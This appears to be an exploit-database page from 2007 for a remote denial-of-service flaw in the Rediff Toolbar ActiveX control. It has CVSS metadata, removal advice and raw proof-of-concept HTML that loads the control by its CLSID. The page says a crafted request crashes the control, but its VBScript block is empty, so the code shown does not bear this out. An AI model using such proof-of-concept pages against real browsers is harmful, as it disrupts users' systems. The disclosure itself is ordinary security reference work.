header-logo
Suggest Exploit
vendor:
Rediff Toolbar
by:
Umesh Wanve
7.5
CVSS
HIGH
Remote Denial of Service
CWE
Product Name: Rediff Toolbar
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Rediff Toolbar ActiveX Control Remote DOS Vulnerability

This exploit targets the Rediff Toolbar ActiveX Control and can be used to trigger a remote Denial of Service (DoS) attack. The vulnerability exists in the control's implementation, allowing an attacker to send a specially crafted request that can cause the control to crash or become unresponsive.

Mitigation:

The vendor has not provided a patch or mitigation for this vulnerability. It is recommended to disable or remove the Rediff Toolbar ActiveX Control from affected systems.
Source

Exploit-DB raw data:

<!--
              Rediff Toolbar ActiveX Control Remote DOS Vulnerability
                          By Umesh Wanve (umesh_345@yahoo.com)

Reference: https://www.securityfocus.com/bid/21924

Date: 08- Jan - 2007

// CLSID: {12F02779-6D88-4958-8AD3-83C12D86ADC7}
// Info: Rediff Toolbar
// ProgID: XBTB00001.XBTB00001.1
// InprocServer32: Program Files\\Rediff Toolbar\\2.0\\redifftoolbar.dll

--!>


<html>

<body>
<OBJECT id="test" WIDTH=445 HEIGHT=40 classid="clsid:12F02779-6D88-4958-8AD3-83C12D86ADC7" >
</OBJECT>

<script language="vbscript">


</script>

</body>
</html>

# milw0rm.com [2007-03-08]

Navigation

Suggest Exploit

Services By CQR